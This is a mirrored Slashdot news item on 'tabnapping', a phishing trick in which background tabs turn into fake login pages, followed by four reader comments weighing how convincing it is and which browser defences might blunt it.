Slashdot Mirror

← Back to Stories (view on slashdot.org)

Tabnapping Scams Around the Corner?

Posted by CmdrTaco on from the well-that's-not-very-nice dept.

scamdetect pointed us to an interesting bit of news about a new security risk called tabnapping that was recently outlined by Aza Raskin. The short story is that background tabs are updated with login forms impersonating the sites they originally contained, but hosted by helpful third parties primarily interested in your password. (CT:Original writeup removed at request of submitter)

4 of 362 comments (clear)

  1. Sneaky... by fuzzyfuzzyfungus · · Score: 3, Interesting

    Obviously, this won't subvert SSL certs or anything; but studies consistently demonstrate that users oscillate between "don't know" and "don't care" about those, so that isn't much comfort.

    And, since pages reloading themselves, or even forwarding to a different domain and URL entirely, after a delay is fairly common(if generally annoying) in a wide variety of legitimate applications, you can't really just break the ability to do that. Sure, you could add it as an advanced option somewhere, or get it largely for free with the right NoScript settings; but there is no way you can break it by default.

    You pretty much just fall back on the phishing filter, which is a lame, AV-esque "solution". This would seem to apply to all tabbed browsers, as well.

  2. disabling scripts on unfocused tabs? by roman_mir · · Score: 4, Interesting

    Maybe it is time for the browsers to take matters more seriously and block any scripts from running in tabs that are not currently in focus.

    But this can be done in separate windows too, not just in tabs. In terms of whether this is a new concept, let's just say that I have 'seen' this done 10 years ago to gain access to some chat accounts.

    --
    You can't handle the truth.
  3. Re:Umm... by fuzzyfuzzyfungus · · Score: 3, Interesting

    P.T. Barnum, expert applied scamologist, is said to have observed that you can "fool some of the people all of the time and all of the people some of the time."

    Arguably, that will be the case here. Your basic clueless noobtard will click on just about anything that looks vaguely plausible, and a lot of stuff that doesn't. This technique will be overkill for them, since straight phishing still works just fine.

    Your competent power user, on the other hand, may not fall for the trivial cases(two or three tabs, "innocuous-linkfarm.typosquatter.com" changes into "evil.ath.cx/yourbankherereallyhonestly.html" in front of your eyes); but they are the ones most likely to have 10 firefox windows open, each with 20 or 30 tabs, possibly on multiple monitors. Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19. That'd be totally understandable mistake, some percentage of the time, especially if you were tired, distracted, multitasking, or getting sauced enough to face a legacy refactoring project.

    Again, tab-related trickery is of no particular use against SSL and cert validation, so the clueful user could detect it that way(unless combined with some attack on SSL, the browser's implementation of it, or the integrity of a trusted certificate authority); but there is no particular reason to suspect that any but the most paranoid user would detect the tab-substitution attack itself.

  4. Re:Not exactly. by WrongSizeGlass · · Score: 4, Interesting

    So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.

    Exactly ... but if the 'fake' site checks your browser history for the specific fake login screens they have in their repertoire then they can show one that you have used recently.